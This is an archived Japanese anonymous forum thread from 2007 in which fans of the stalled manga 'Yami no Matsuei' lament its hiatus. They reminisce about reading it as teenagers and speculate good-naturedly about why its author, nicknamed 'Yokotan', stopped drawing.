ちょぴり妖しげな事件を解決していく話でも描いてよ、ヨコタン

144 :花と名無しさん:2007/11/21(水) 23:59:45 ID:???0
ゲーム三昧でも家ゲーならまだしも
今はMMOというオンラインゲームありますので
ゲームからは離れられないかもね
てか草薙のアシ時代の病み松同人本とか久々に倉庫でみつけた
・・・・・読んでしまったじゃないか

145 :花と名無しさん:2007/11/23(金) 09:36:04 ID:???O
とうとう2007年の花とゆめは全て出てしまいました
ヨコタン…

146 :花と名無しさん:2007/11/23(金) 19:03:41 ID:???0
冬休みと夏休みとGWにアシにやりにヨコタンのとこ行きたいよ・・・


147 :花と名無しさん:2007/11/24(土) 11:45:48 ID:???O
ヨコタンにはアシを雇う余裕がありません

148 :花と名無しさん:2007/11/24(土) 13:17:54 ID:???O
始めてハマった少女漫画が闇末だったな…
まだ12巻出てなかったんだ。当時中学生だったあたしは成人しましたよ…ハハハ

149 :花と名無しさん:2007/11/24(土) 14:17:07 ID:???0
自分も11巻を読んでた頃は中学生だったが、今日成人した!
ヨコタン…生きてますか?

150 :花と名無しさん:2007/11/24(土) 19:35:06 ID:???0
本誌スレで黒歴史にされててワロタwww


。・゚・(ノ∀`)・゚・。

151 :花と名無しさん:2007/11/25(日) 23:12:01 ID:???O
もうヤミマツじゃなくて他誌でもいいから何か描いてくれないかな?
少年誌でもBl誌でもラノベの挿し絵とかでもいいよ!私はヨコタンについていくよ!

152 :花と名無しさん:2007/11/26(月) 11:16:44 ID:???O
みんな当時は中学生だったのか。
そんな私も成人式だよ。ヨコタン、ギャラいらないからアシやらせてよ…

153 :花と名無しさん:2007/11/26(月) 16:28:01 ID:???O
連載再開される夢見て切ない気持ちになってこのスレにきてしまった。
私も中学生か高校生だったなぁ。
ヨコタン…(´;ω;`)

154 :花と名無しさん:2007/11/26(月) 22:13:27 ID:???0
なんというか、勿体無いの極みだよなぁヨコタン
成功した仕事をもてあまし、たくさんのファンをもてあまし、
実力をもてあまし、画力をもてあまし…ああもったいない

155 :花と名無しさん:2007/11/26(月) 23:56:38 ID:???0
ヨコタンはもう漫画を描くのが嫌になったのかもしれない…
それでもいつか描く気になった時に
待っていた人がいることを知って欲しくて…まだ待ってる

156 :花と名無しさん:2007/11/27(火) 00:10:08 ID:???0
>>155
なんか切ないなぁ(;ω;)
じゃあ自分もここを保守するよ。待ってるよ。

157 :花と名無しさん:2007/11/27(火) 00:13:56 ID:???0
ヨコタン復活の報を聞けさえすれば卒論に手を付けられる気がするんだ…
それだけ…それだけさえあれば

158 :花と名無しさん:2007/11/27(火) 20:19:31 ID:???0
オリンピックみたいに4年に1冊でいいから
書き下ろしで単行本出してくれたらなぁ…。

159 :花と名無しさん:2007/11/27(火) 22:08:53 ID:???O
4年に一度はつらいな。しかし年1は無理か…

160 :花と名無しさん:2007/11/28(水) 15:47:10 ID:???O
誰かこのスレのURLをヨコタンに!
…いや、逆効果かな…

161 :花と名無しさん:2007/11/28(水) 17:20:10 ID:???0
ヨコタンネット環境まだあるのかな…
スレでも出てたけど本当にHPに特攻?されたのなら
多分ネットも嫌になっちゃってやってないと思うんだよね

そうなると今ヨコタンは毎日ゲームだけやってるのかな
貯金が底をついたらどうするんだろう。
漫画描き続ける将来にもう期待が持てなくなって
バイト生活とかはたまた会社員になってたりして…orz

162 :花と名無しさん:2007/11/28(水) 17:57:21 ID:???0
ヨコタン会社員とか出来なさそうだよな・・・
なんとなく実家が資産家のイメージがあるのだが
それなら働かなくてもなんとかなりそうだよね。

163 :花と名無しさん:2007/11/29(木) 08:15:28 ID:???0
大金持ちとはいわないまでも資産収入のある実家暮らしなら
貯金が底をつくなんてことないんじゃないかと思う

164 :花と名無しさん:2007/11/29(木) 17:50:18 ID:???0
資産家って本当なの??
そもそも資産家じゃ漫画描き目指さなくても遊んで暮らせたんじゃないの??

165 :花と名無しさん:2007/11/29(木) 18:05:56 ID:???0
資産家かどうかはしらんけど、漫画家になったのは絵を描くのが好きだからじゃないの?
だけど〆切とか、読者との確執とか、夢が果たされたことによるモチベーションの低下とか
ある程度儲けてゲームやりたい放題になってしまったこととか、そういうものが
絵を描くよりもひきこもることを選ばせてしまったんだろうね

ヨコタンの人間性に問題がないとは言えないけど
こんだけ条件揃ったら、逃げたくなるのもわかる気はする

166 :花と名無しさん:2007/11/29(木) 19:54:55 ID:???0
どうでもいいとこに拘りすぎたよな
背景なんて描き込まなくても人物さえまともに描いてたらよかったのに
ストーリーだって他作家・ゲームリスペクトで変に複雑にする必要なかったのに
読者からのお便りなんていくら返事コールされてもスルーすればよかったのに


167 :花と名無しさん:2007/11/30(金) 09:19:19 ID:???0
でもその拘りが好きだったし、そこに皆夢中になってたんだし、
だから今でも忘れられなくて待ってるんだと思う。

っていうか実は今も拘って描き続けてるんじゃないかと妄想。
絵が嫌いになれない人の拘りだよあの域になると・・・一旦離れても
自分でそのうちペンをとると思う。
そのうち全巻書き下ろし新作なんてみれるかもなんて・・夢みすぎ?

168 :花と名無しさん:2007/11/30(金) 16:46:23 ID:???0
絵は描いてるだろうなとは思うけど行き詰まって逃げちゃった闇末の新作は期待できなさそ。。。
遅筆でも完結させたいって気持ちあるかなあ。

169 :花と名無しさん:2007/11/30(金) 18:45:01 ID:???0
たまに考えるんだけど、長期休載とかしてる漫画家や作家って
ペンネームとか変えて別の作品描いてないかなって思うんだ。
でも、これって毎日仕事をしなきゃいけない一般人の考えで
毎日仕事しなくても〆切に間に合えば大丈夫な人は
そう他の仕事に手を出したりしないよね…orz

それにしても、返事コールなんてする読者がいるのか…あつかましい気がする。

170 :花と名無しさん:2007/11/30(金) 22:12:29 ID:???0
ファンレター書いたことないけど
小中学生の読者なら「へんじください!!」という言葉は自然に出てしまうんじゃない
さらに厨メなファンレターを出す読者も多数いるだろう
普通の作者なら苦笑いでスルーするか気が向いたら年賀か暑中見舞い1枚送って終わりなのに
お手紙講座とお返事ペーパー送ります告知・・・編集もフォローしろよ

171 :花と名無しさん:2007/12/01(土) 01:47:44 ID:???0
同人の通販経験があるならその辺も上手くかわせたんだろうな。


172 :花と名無しさん:2007/12/01(土) 11:36:05 ID:???0
その辺の角が取れて今は非常に人格者の
漫画家になっている頃合だと思うんだ。

173 :花と名無しさん:2007/12/01(土) 19:38:16 ID:???0
どこかの会社にでも就職して世間にまみれていれば可能性もあるかもね。
彼女に必要なのは有能なマネージャーだと思う。
でも三十路越えてるんだよね。
筆圧とかそろそろ加齢の影響が出始める頃じゃないかな。。不安。

174 :花と名無しさん:2007/12/02(日) 01:43:48 ID:???0
実際>>94で12巻は出せないのかな?
ページ足りてない?

175 :花と名無しさん:2007/12/02(日) 09:12:18 ID:???O
ヨコタンが単行本の作業をしてないからw

176 :花と名無しさん:2007/12/03(月) 01:02:15 ID:???O
このスレもう菩薩住人しかいないのが幸いだね。
最近の過去スレと共に編集部に教えたいくらいだよ。

純粋に好きで密やかに待っている人がいます、と

ゆまさやが出てくる巻でも読むか…(´・ω・`)

177 :花と名無しさん:2007/12/03(月) 21:42:24 ID:???O
今日やってたコナンSPで速水 奨が出てたんだけど、何気なく実況に行ったら
大量のレスの中に「むらきだー!」ってレスがあって泣いた。

ヨコタン、まだ闇末を覚えてくれている人もいるんだよ。だからまた続きを描いてね…。

178 :花と名無しさん:2007/12/03(月) 22:39:07 ID:???0
>>177
速水 奨!
しまった、見れば良かった!

179 :花と名無しさん:2007/12/03(月) 22:55:25 ID:???0
>>177
多分このスレの人じゃない?w

180 :花と名無しさん:2007/12/04(火) 02:48:40 ID:???0
邑輝センセ何歳になったんだろ…

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)